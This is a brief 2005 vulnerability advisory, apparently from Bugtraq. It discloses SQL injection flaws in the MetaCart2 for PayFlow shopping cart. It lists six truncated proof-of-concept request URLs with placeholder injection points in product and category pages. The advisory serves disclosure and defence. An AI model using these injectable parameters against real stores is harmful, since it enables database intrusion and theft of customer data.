Severity: High
Title: MetaCart2 for PayFlow Multiple SQL Injection Vulnerabilities
Date: 27/04/2005
Vendor: MetaCart
Vendor Website: http://metalinks.com

Proof of Concept Exploits:

http://example.com/mcart2pfp/productsByCat..._NAME=Computers
SQL INJECTION

http://example.com/mcart2pfp/productsByCat...og_NAME=Laptops
SQL INJECTION

http://example.com/mcart2pfp/productsByCat...og_NAME=Laptops
SQL INJECTION

http://example.com/mcart2pfp/productsByCat...9;SQL_INJECTION
SQL INJECTION

http://example.com/mcart2pfp/product.asp?i...9;SQL_INJECTION
SQL INJECTION

http://example.com/mcart2pfp/productsByCat...ON&%3bpage=2
SQL INJECTION

Author:
These vulnerabilities have been found and released by Diabolic Crab



Source: http://seclists.org/lists/bugtraq/2005/Apr/0429.html